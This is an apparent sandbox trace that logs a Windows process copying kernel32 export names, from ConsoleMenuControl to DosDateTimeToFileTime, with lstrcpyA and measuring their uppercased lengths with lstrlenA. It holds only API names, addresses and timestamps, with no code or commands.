[0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0090.333] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0090.333] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0090.333] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0090.333] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0090.333] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0090.333] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0090.333] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0090.333] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0090.333] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0090.334] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0090.334] lstrlenA (lpString="COPYCONTEXT") returned 11 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0090.334] lstrlenA (lpString="COPYFILEA") returned 9 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0090.334] lstrlenA (lpString="COPYFILEEXA") returned 11 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0090.334] lstrlenA (lpString="COPYFILEEXW") returned 11 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0090.334] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0090.334] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0090.334] lstrlenA (lpString="COPYFILEW") returned 9 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0090.334] lstrlenA (lpString="COPYLZFILE") returned 10 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0090.334] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0090.334] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0090.334] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0090.334] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0090.334] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0090.334] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0090.334] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0090.334] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0090.334] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0090.334] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0090.335] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0090.335] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0090.335] lstrlenA (lpString="CREATEEVENTA") returned 12 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0090.335] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0090.335] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0090.335] lstrlenA (lpString="CREATEEVENTW") returned 12 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0090.335] lstrlenA (lpString="CREATEFIBER") returned 11 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0090.335] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0090.335] lstrlenA (lpString="CREATEFILEA") returned 11 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0090.335] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0090.335] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0090.335] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0090.335] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0090.335] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0090.335] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0090.335] lstrlenA (lpString="CREATEFILEW") returned 11 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0090.335] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0090.335] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0090.335] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0090.335] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0090.336] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0090.336] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0090.336] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0090.336] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0090.336] lstrlenA (lpString="CREATEJOBSET") returned 12 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0090.336] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0090.336] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0090.336] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0090.336] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0090.336] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0090.336] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0090.336] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0090.336] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0090.336] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0090.336] lstrlenA (lpString="CREATEPIPE") returned 10 [0090.336] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0090.337] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0090.337] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0090.337] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0090.337] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0090.337] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0090.337] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0090.337] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0090.337] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0090.337] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0090.337] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0090.337] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0090.337] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0090.337] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0090.337] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0090.337] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0090.337] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0090.337] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0090.337] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0090.337] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0090.337] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0090.338] lstrlenA (lpString="CREATETHREAD") returned 12 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0090.338] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0090.338] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0090.338] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0090.338] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0090.338] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0090.338] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0090.338] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0090.338] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0090.338] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0090.338] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0090.338] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0090.338] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0090.338] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0090.338] lstrlenA (lpString="CTRLROUTINE") returned 11 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0090.338] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0090.338] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0090.338] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0090.338] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0090.338] lstrlenA (lpString="DEBUGBREAK") returned 10 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0090.339] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0090.339] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0090.339] lstrlenA (lpString="DECODEPOINTER") returned 13 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0090.339] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0090.339] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0090.339] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0090.339] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0090.339] lstrlenA (lpString="DELETEATOM") returned 10 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0090.339] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0090.339] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0090.339] lstrlenA (lpString="DELETEFIBER") returned 11 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0090.339] lstrlenA (lpString="DELETEFILEA") returned 11 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0090.339] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0090.339] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0090.339] lstrlenA (lpString="DELETEFILEW") returned 11 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0090.339] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0090.339] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0090.339] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0090.339] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0090.340] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0090.340] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0090.340] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0090.340] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0090.340] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0090.340] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0090.340] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0090.340] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0090.340] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0090.340] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0090.340] lstrcpyA (in: lpString1=0x3c2e4c0, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0090.340] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 